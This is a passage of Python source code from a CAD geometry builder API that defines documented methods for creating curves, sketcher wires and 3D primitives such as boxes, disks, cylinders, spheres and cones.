# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created B-Spline curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeInterpolWithTangents(self, thePoints, theFirstVec, theLastVec, theName=None):
"""
Create B-Spline curve on the set of points.
Parameters:
thePoints Sequence of points for the B-Spline curve.
theFirstVec Vector object, defining the curve direction at its first point.
theLastVec Vector object, defining the curve direction at its last point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created B-Spline curve.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineInterpolWithTangents(thePoints, theFirstVec, theLastVec)
RaiseIfFailed("MakeInterpolWithTangents", self.CurvesOp)
self._autoPublish(anObj, theName, "bspline")
return anObj
## Creates a curve using the parametric definition of the basic points.
# @param thexExpr parametric equation of the coordinates X.
# @param theyExpr parametric equation of the coordinates Y.
# @param thezExpr parametric equation of the coordinates Z.
# @param theParamMin the minimal value of the parameter.
# @param theParamMax the maximum value of the parameter.
# @param theParamStep the number of steps if theNewMethod = True, else step value of the parameter.
# @param theCurveType the type of the curve,
# one of GEOM.Polyline, GEOM.Bezier, GEOM.Interpolation.
# @param theNewMethod flag for switching to the new method if the flag is set to false a deprecated method is used which can lead to a bug.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeCurveParametric(self, thexExpr, theyExpr, thezExpr,
theParamMin, theParamMax, theParamStep, theCurveType, theNewMethod=False, theName=None ):
"""
Creates a curve using the parametric definition of the basic points.
Parameters:
thexExpr parametric equation of the coordinates X.
theyExpr parametric equation of the coordinates Y.
thezExpr parametric equation of the coordinates Z.
theParamMin the minimal value of the parameter.
theParamMax the maximum value of the parameter.
theParamStep the number of steps if theNewMethod = True, else step value of the parameter.
theCurveType the type of the curve,
one of GEOM.Polyline, GEOM.Bezier, GEOM.Interpolation.
theNewMethod flag for switching to the new method if the flag is set to false a deprecated
method is used which can lead to a bug.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created curve.
"""
theParamMin,theParamMax,theParamStep,Parameters = ParseParameters(theParamMin,theParamMax,theParamStep)
if theNewMethod:
anObj = self.CurvesOp.MakeCurveParametricNew(thexExpr,theyExpr,thezExpr,theParamMin,theParamMax,theParamStep,theCurveType)
else:
anObj = self.CurvesOp.MakeCurveParametric(thexExpr,theyExpr,thezExpr,theParamMin,theParamMax,theParamStep,theCurveType)
RaiseIfFailed("MakeSplineInterpolation", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "curve")
return anObj
## Create an isoline curve on a face.
# @param theFace the face for which an isoline is created.
# @param IsUIsoline True for U-isoline creation; False for V-isoline
# creation.
# @param theParameter the U parameter for U-isoline or V parameter
# for V-isoline.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created isoline edge or
# a compound of edges.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeIsoline(self, theFace, IsUIsoline, theParameter, theName=None):
"""
Create an isoline curve on a face.
Parameters:
theFace the face for which an isoline is created.
IsUIsoline True for U-isoline creation; False for V-isoline
creation.
theParameter the U parameter for U-isoline or V parameter
for V-isoline.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created isoline edge or a
compound of edges.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeIsoline(theFace, IsUIsoline, theParameter)
RaiseIfFailed("MakeIsoline", self.CurvesOp)
if IsUIsoline:
self._autoPublish(anObj, theName, "U-Isoline")
else:
self._autoPublish(anObj, theName, "V-Isoline")
return anObj
# end of l4_curves
## @}
## @addtogroup l3_sketcher
## @{
## Create a sketcher (wire or face), following the textual description,
# passed through <VAR>theCommand</VAR> argument. \n
# Edges of the resulting wire or face will be arcs of circles and/or linear segments. \n
# Format of the description string have to be the following:
#
# "Sketcher[:F x1 y1]:CMD[:CMD[:CMD...]]"
#
# Where:
# - x1, y1 are coordinates of the first sketcher point (zero by default),
# - CMD is one of
# - "R angle" : Set the direction by angle
# - "D dx dy" : Set the direction by DX & DY
# .
# \n
# - "TT x y" : Create segment by point at X & Y
# - "T dx dy" : Create segment by point with DX & DY
# - "L length" : Create segment by direction & Length
# - "IX x" : Create segment by direction & Intersect. X
# - "IY y" : Create segment by direction & Intersect. Y
# .
# \n
# - "C radius length" : Create arc by direction, radius and length(in degree)
# - "AA x y": Create arc by point at X & Y
# - "A dx dy" : Create arc by point with DX & DY
# - "UU x y radius flag1": Create arc by point at X & Y with given radiUs
# - "U dx dy radius flag1" : Create arc by point with DX & DY with given radiUs
# - "EE x y xc yc flag1 flag2": Create arc by point at X & Y with given cEnter coordinates
# - "E dx dy dxc dyc radius flag1 flag2" : Create arc by point with DX & DY with given cEnter coordinates
# .
# \n
# - "WW" : Close Wire (to finish)
# - "WF" : Close Wire and build face (to finish)
# .
# \n
# - Flag1 (= reverse) is 0 or 2 ...
# - if 0 the drawn arc is the one of lower angle (< Pi)
# - if 2 the drawn arc ius the one of greater angle (> Pi)
# .
# \n
# - Flag2 (= control tolerance) is 0 or 1 ...
# - if 0 the specified end point can be at a distance of the arc greater than the tolerance (10^-7)
# - if 1 the wire is built only if the end point is on the arc
# with a tolerance of 10^-7 on the distance else the creation fails
#
# @param theCommand String, defining the sketcher in local
# coordinates of the working plane.
# @param theWorkingPlane Nine double values, defining origin,
# OZ and OX directions of the working plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_sketcher_page "Example"
@ManageTransactions("CurvesOp")
def MakeSketcher(self, theCommand, theWorkingPlane = [0,0,0, 0,0,1, 1,0,0], theName=None):
"""
Create a sketcher (wire or face), following the textual description, passed
through theCommand argument.
Edges of the resulting wire or face will be arcs of circles and/or linear segments.
Format of the description string have to be the following:
"Sketcher[:F x1 y1]:CMD[:CMD[:CMD...]]"
Where:
- x1, y1 are coordinates of the first sketcher point (zero by default),
- CMD is one of
- "R angle" : Set the direction by angle
- "D dx dy" : Set the direction by DX & DY
- "TT x y" : Create segment by point at X & Y
- "T dx dy" : Create segment by point with DX & DY
- "L length" : Create segment by direction & Length
- "IX x" : Create segment by direction & Intersect. X
- "IY y" : Create segment by direction & Intersect. Y
- "C radius length" : Create arc by direction, radius and length(in degree)
- "AA x y": Create arc by point at X & Y
- "A dx dy" : Create arc by point with DX & DY
- "UU x y radius flag1": Create arc by point at X & Y with given radiUs
- "U dx dy radius flag1" : Create arc by point with DX & DY with given radiUs
- "EE x y xc yc flag1 flag2": Create arc by point at X & Y with given cEnter coordinates
- "E dx dy dxc dyc radius flag1 flag2" : Create arc by point with DX & DY with given cEnter coordinates
- "WW" : Close Wire (to finish)
- "WF" : Close Wire and build face (to finish)
- Flag1 (= reverse) is 0 or 2 ...
- if 0 the drawn arc is the one of lower angle (< Pi)
- if 2 the drawn arc ius the one of greater angle (> Pi)
- Flag2 (= control tolerance) is 0 or 1 ...
- if 0 the specified end point can be at a distance of the arc greater than the tolerance (10^-7)
- if 1 the wire is built only if the end point is on the arc
with a tolerance of 10^-7 on the distance else the creation fails
Parameters:
theCommand String, defining the sketcher in local
coordinates of the working plane.
theWorkingPlane Nine double values, defining origin,
OZ and OX directions of the working plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
# Example: see GEOM_TestAll.py
theCommand,Parameters = ParseSketcherCommand(theCommand)
anObj = self.CurvesOp.MakeSketcher(theCommand, theWorkingPlane)
RaiseIfFailed("MakeSketcher", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
## Create a sketcher (wire or face), following the textual description,
# passed through <VAR>theCommand</VAR> argument. \n
# For format of the description string see MakeSketcher() method.\n
# @param theCommand String, defining the sketcher in local
# coordinates of the working plane.
# @param theWorkingPlane Planar Face or LCS(Marker) of the working plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_sketcher_page "Example"
@ManageTransactions("CurvesOp")
def MakeSketcherOnPlane(self, theCommand, theWorkingPlane, theName=None):
"""
Create a sketcher (wire or face), following the textual description,
passed through theCommand argument.
For format of the description string see geompy.MakeSketcher() method.
Parameters:
theCommand String, defining the sketcher in local
coordinates of the working plane.
theWorkingPlane Planar Face or LCS(Marker) of the working plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
theCommand,Parameters = ParseSketcherCommand(theCommand)
anObj = self.CurvesOp.MakeSketcherOnPlane(theCommand, theWorkingPlane)
RaiseIfFailed("MakeSketcherOnPlane", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
## Obtain a 2D sketcher interface
# @return An instance of @ref gsketcher.Sketcher2D "Sketcher2D" interface
def Sketcher2D (self):
"""
Obtain a 2D sketcher interface.
Example of usage:
sk = geompy.Sketcher2D()
sk.addPoint(20, 20)
sk.addSegmentRelative(15, 70)
sk.addSegmentPerpY(50)
sk.addArcRadiusRelative(25, 15, 14.5, 0)
sk.addArcCenterAbsolute(1, 1, 50, 50, 0, 0)
sk.addArcDirectionRadiusLength(20, 20, 101, 162.13)
sk.close()
Sketch_1 = sk.wire(geomObj_1)
"""
sk = Sketcher2D (self)
return sk
## Create a sketcher wire, following the numerical description,
# passed through <VAR>theCoordinates</VAR> argument. \n
# @param theCoordinates double values, defining points to create a wire,
# passing from it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_3dsketcher_page "Example"
@ManageTransactions("CurvesOp")
def Make3DSketcher(self, theCoordinates, theName=None):
"""
Create a sketcher wire, following the numerical description,
passed through theCoordinates argument.
Parameters:
theCoordinates double values, defining points to create a wire,
passing from it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the created wire.
"""
theCoordinates,Parameters = ParseParameters(theCoordinates)
anObj = self.CurvesOp.Make3DSketcher(theCoordinates)
RaiseIfFailed("Make3DSketcher", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
## Obtain a 3D sketcher interface
# @return An instance of @ref gsketcher.Sketcher3D "Sketcher3D" interface
#
# @ref tui_3dsketcher_page "Example"
def Sketcher3D (self):
"""
Obtain a 3D sketcher interface.
Example of usage:
sk = geompy.Sketcher3D()
sk.addPointsAbsolute(0,0,0, 70,0,0)
sk.addPointsRelative(0, 0, 130)
sk.addPointAnglesLength("OXY", 50, 0, 100)
sk.addPointAnglesLength("OXZ", 30, 80, 130)
sk.close()
a3D_Sketcher_1 = sk.wire()
"""
sk = Sketcher3D (self)
return sk
## Obtain a 2D polyline creation interface
# @return An instance of @ref gsketcher.Polyline2D "Polyline2D" interface
#
# @ref tui_3dsketcher_page "Example"
def Polyline2D (self):
"""
Obtain a 2D polyline creation interface.
Example of usage:
pl = geompy.Polyline2D()
pl.addSection("section 1", GEOM.Polyline, True)
pl.addPoints(0, 0, 10, 0, 10, 10)
pl.addSection("section 2", GEOM.Interpolation, False)
pl.addPoints(20, 0, 30, 0, 30, 10)
resultObj = pl.result(WorkingPlane)
"""
pl = Polyline2D (self)
return pl
# end of l3_sketcher
## @}
## @addtogroup l3_3d_primitives
## @{
## Create a box by coordinates of two opposite vertices.
#
# @param x1,y1,z1 double values, defining first point it.
# @param x2,y2,z2 double values, defining first point it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
def MakeBox(self, x1, y1, z1, x2, y2, z2, theName=None):
"""
Create a box by coordinates of two opposite vertices.
Parameters:
x1,y1,z1 double values, defining first point.
x2,y2,z2 double values, defining second point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
pnt1 = self.MakeVertex(x1,y1,z1)
pnt2 = self.MakeVertex(x2,y2,z2)
# note: auto-publishing is done in self.MakeBoxTwoPnt()
return self.MakeBoxTwoPnt(pnt1, pnt2, theName)
## Create a box with specified dimensions along the coordinate axes
# and with edges, parallel to the coordinate axes.
# Center of the box will be at point (DX/2, DY/2, DZ/2).
# @param theDX Length of Box edges, parallel to OX axis.
# @param theDY Length of Box edges, parallel to OY axis.
# @param theDZ Length of Box edges, parallel to OZ axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
@ManageTransactions("PrimOp")
def MakeBoxDXDYDZ(self, theDX, theDY, theDZ, theName=None):
"""
Create a box with specified dimensions along the coordinate axes
and with edges, parallel to the coordinate axes.
Center of the box will be at point (DX/2, DY/2, DZ/2).
Parameters:
theDX Length of Box edges, parallel to OX axis.
theDY Length of Box edges, parallel to OY axis.
theDZ Length of Box edges, parallel to OZ axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakeBoxDXDYDZ(theDX, theDY, theDZ)
RaiseIfFailed("MakeBoxDXDYDZ", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "box")
return anObj
## Create a box with two specified opposite vertices,
# and with edges, parallel to the coordinate axes
# @param thePnt1 First of two opposite vertices.
# @param thePnt2 Second of two opposite vertices.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
@ManageTransactions("PrimOp")
def MakeBoxTwoPnt(self, thePnt1, thePnt2, theName=None):
"""
Create a box with two specified opposite vertices,
and with edges, parallel to the coordinate axes
Parameters:
thePnt1 First of two opposite vertices.
thePnt2 Second of two opposite vertices.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeBoxTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeBoxTwoPnt", self.PrimOp)
self._autoPublish(anObj, theName, "box")
return anObj
## Create a face with specified dimensions with edges parallel to coordinate axes.
# @param theH height of Face.
# @param theW width of Face.
# @param theOrientation face orientation: 1-OXY, 2-OYZ, 3-OZX
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeFaceHW(self, theH, theW, theOrientation, theName=None):
"""
Create a face with specified dimensions with edges parallel to coordinate axes.
Parameters:
theH height of Face.
theW width of Face.
theOrientation face orientation: 1-OXY, 2-OYZ, 3-OZX
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
theH,theW,Parameters = ParseParameters(theH, theW)
anObj = self.PrimOp.MakeFaceHW(theH, theW, theOrientation)
RaiseIfFailed("MakeFaceHW", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rectangle")
return anObj
## Create a face from another plane and two sizes,
# vertical size and horisontal size.
# @param theObj Normale vector to the creating face or
# the face object.
# @param theH Height (vertical size).
# @param theW Width (horisontal size).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeFaceObjHW(self, theObj, theH, theW, theName=None):
"""
Create a face from another plane and two sizes,
vertical size and horisontal size.
Parameters:
theObj Normale vector to the creating face or
the face object.
theH Height (vertical size).
theW Width (horisontal size).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
theH,theW,Parameters = ParseParameters(theH, theW)
anObj = self.PrimOp.MakeFaceObjHW(theObj, theH, theW)
RaiseIfFailed("MakeFaceObjHW", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rectangle")
return anObj
## Create a disk with given center, normal vector and radius.
# @param thePnt Disk center.
# @param theVec Vector, normal to the plane of the disk.
# @param theR Disk radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_disk "Example"
@ManageTransactions("PrimOp")
def MakeDiskPntVecR(self, thePnt, theVec, theR, theName=None):
"""
Create a disk with given center, normal vector and radius.
Parameters:
thePnt Disk center.
theVec Vector, normal to the plane of the disk.
theR Disk radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeDiskPntVecR(thePnt, theVec, theR)
RaiseIfFailed("MakeDiskPntVecR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "disk")
return anObj
## Create a disk, passing through three given points
# @param thePnt1,thePnt2,thePnt3 Points, defining the disk.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_disk "Example"
@ManageTransactions("PrimOp")
def MakeDiskThreePnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a disk, passing through three given points
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the disk.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeDiskThreePnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeDiskThreePnt", self.PrimOp)
self._autoPublish(anObj, theName, "disk")
return anObj
## Create a disk with specified dimensions along OX-OY coordinate axes.
# @param theR Radius of Face.
# @param theOrientation set the orientation belong axis OXY or OYZ or OZX
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeDiskR(self, theR, theOrientation, theName=None):
"""
Create a disk with specified dimensions along OX-OY coordinate axes.
Parameters:
theR Radius of Face.
theOrientation set the orientation belong axis OXY or OYZ or OZX
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
Example of usage:
Disk3 = geompy.MakeDiskR(100., 1)
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeDiskR(theR, theOrientation)
RaiseIfFailed("MakeDiskR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "disk")
return anObj
## Create a cylinder with given base point, axis, radius and height.
# @param thePnt Central point of cylinder base.
# @param theAxis Cylinder axis.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinder(self, thePnt, theAxis, theR, theH, theName=None):
"""
Create a cylinder with given base point, axis, radius and height.
Parameters:
thePnt Central point of cylinder base.
theAxis Cylinder axis.
theR Cylinder radius.
theH Cylinder height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
theR,theH,Parameters = ParseParameters(theR, theH)
anObj = self.PrimOp.MakeCylinderPntVecRH(thePnt, theAxis, theR, theH)
RaiseIfFailed("MakeCylinderPntVecRH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a portion of cylinder with given base point, axis, radius, height and angle.
# @param thePnt Central point of cylinder base.
# @param theAxis Cylinder axis.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theA Cylinder angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderA(self, thePnt, theAxis, theR, theH, theA, theName=None):
"""
Create a portion of cylinder with given base point, axis, radius, height and angle.
Parameters:
thePnt Central point of cylinder base.
theAxis Cylinder axis.
theR Cylinder radius.
theH Cylinder height.
theA Cylinder angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theA,str):
flag = True
theR,theH,theA,Parameters = ParseParameters(theR, theH, theA)
if flag:
theA = theA*math.pi/180.
anObj = self.PrimOp.MakeCylinderPntVecRHA(thePnt, theAxis, theR, theH, theA)
RaiseIfFailed("MakeCylinderPntVecRHA", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a cylinder with given radius and height at
# the origin of coordinate system. Axis of the cylinder
# will be collinear to the OZ axis of the coordinate system.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderRH(self, theR, theH, theName=None):
"""
Create a cylinder with given radius and height at
the origin of coordinate system. Axis of the cylinder
will be collinear to the OZ axis of the coordinate system.
Parameters:
theR Cylinder radius.
theH Cylinder height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
theR,theH,Parameters = ParseParameters(theR, theH)
anObj = self.PrimOp.MakeCylinderRH(theR, theH)
RaiseIfFailed("MakeCylinderRH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a portion of cylinder with given radius, height and angle at
# the origin of coordinate system. Axis of the cylinder
# will be collinear to the OZ axis of the coordinate system.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theA Cylinder angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderRHA(self, theR, theH, theA, theName=None):
"""
Create a portion of cylinder with given radius, height and angle at
the origin of coordinate system. Axis of the cylinder
will be collinear to the OZ axis of the coordinate system.
Parameters:
theR Cylinder radius.
theH Cylinder height.
theA Cylinder angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theA,str):
flag = True
theR,theH,theA,Parameters = ParseParameters(theR, theH, theA)
if flag:
theA = theA*math.pi/180.
anObj = self.PrimOp.MakeCylinderRHA(theR, theH, theA)
RaiseIfFailed("MakeCylinderRHA", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a sphere with given center and radius.
# @param thePnt Sphere center.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
@ManageTransactions("PrimOp")
def MakeSpherePntR(self, thePnt, theR, theName=None):
"""
Create a sphere with given center and radius.
Parameters:
thePnt Sphere center.
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeSpherePntR(thePnt, theR)
RaiseIfFailed("MakeSpherePntR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sphere")
return anObj
## Create a sphere with given center and radius.
# @param x,y,z Coordinates of sphere center.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
def MakeSphere(self, x, y, z, theR, theName=None):
"""
Create a sphere with given center and radius.
Parameters:
x,y,z Coordinates of sphere center.
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
point = self.MakeVertex(x, y, z)
# note: auto-publishing is done in self.MakeSpherePntR()
anObj = self.MakeSpherePntR(point, theR, theName)
return anObj
## Create a sphere with given radius at the origin of coordinate system.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
@ManageTransactions("PrimOp")
def MakeSphereR(self, theR, theName=None):
"""
Create a sphere with given radius at the origin of coordinate system.
Parameters:
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeSphereR(theR)
RaiseIfFailed("MakeSphereR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sphere")
return anObj
## Create a cone with given base point, axis, height and radiuses.
# @param thePnt Central point of the first cone base.
# @param theAxis Cone axis.
# @param theR1 Radius of the first cone base.
# @param theR2 Radius of the second cone base.
# \note If both radiuses are non-zero, the cone will be truncated.
# \note If the radiuses are equal, a cylinder will be created instead.
# @param theH Cone height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cone.
#
# @ref tui_creation_cone "Example"
@ManageTransactions("PrimOp")
def MakeCone(self, thePnt, theAxis, theR1, theR2, theH, theName=None):
"""
Create a cone with given base point, axis, height and radiuses.
Parameters:
thePnt Central point of the first cone base.
theAxis Cone axis.
theR1 Radius of the first cone base.
theR2 Radius of the second cone base.
theH Cone height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If both radiuses are non-zero, the cone will be truncated.
If the radiuses are equal, a cylinder will be created instead.
Returns:
New GEOM.GEOM_Object, containing the created cone.
"""
# Example: see GEOM_TestAll.py
theR1,theR2,theH,Parameters = ParseParameters(theR1,theR2,theH)
anObj = self.PrimOp.MakeConePntVecR1R2H(thePnt, theAxis, theR1, theR2, theH)
RaiseIfFailed("MakeConePntVecR1R2H", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cone")
return anObj
## Create a cone with given height and radiuses at
# the origin of coordinate system. Axis of the cone will
# be collinear to the OZ axis of the coordinate system.
# @param theR1 Radius of the first cone base.
# @param theR2 Radius of the second cone base.
# \note If both radiuses are non-zero, the cone will be truncated.
# \note If the radiuses are equal, a cylinder will be created instead.
# @param theH Cone height.
